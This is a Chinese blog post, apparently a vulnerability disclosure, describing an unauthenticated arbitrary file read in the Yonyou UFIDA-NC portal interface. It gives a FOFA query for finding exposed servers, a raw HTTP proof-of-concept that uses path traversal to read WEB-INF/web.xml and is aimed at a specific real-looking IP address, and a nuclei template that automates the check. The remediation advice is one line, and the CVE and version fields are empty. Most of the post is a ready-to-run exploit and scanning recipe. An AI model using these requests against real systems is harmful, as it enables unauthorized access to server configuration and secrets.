用友 ufida-nc 文件读取漏洞

用友 ufida-nc 文件读取漏洞

1.漏洞介绍

用友移动系统管理portal接口存在任意文件读取,攻击者可在无需登录的情况下进行任意文件读取

2.漏洞编号
CVECNVDCNNVD
---

3.影响范围
名称版本号
--

4.检索特征

FOFA:app=“用友-UFIDA-NC”
在这里插入图片描述

5.POC
GET http://101.132.97.158:8088/portal/file?cmd=getFileLocal&fileid=../../../../webapps/nc_web/WEB-INF/web.xml HTTP/1.1
Host: 101.132.97.158:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Connection: close
Accept-Encoding: gzip, deflate


在这里插入图片描述
nuclei检测

id: yongyou-ufida-nc-fileread

info:
  name: 用友-ufida-nc-文件读取
  author: test
  severity: high

  description: 用友移动系统管理portal接口存在任意文件读取,攻击者可在无需登录的情况下进行任意文件读取。
  metadata:
    max-request: 1
    fofa-query: app="用友-UFIDA-NC"
    verified: true
  reference:
    - https://
  tags: auto

http:
  - raw:
      - |+
        GET /portal/file?cmd=getFileLocal&fileid=../../../../webapps/nc_web/WEB-INF/web.xml HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.9
        Cache-Control: no-cache
        Connection: close

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'version=') && status_code==200 && contains(header,'attachment; filename')"

6.修复建议

更新到最新版本

7.参考信息
  • 6
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值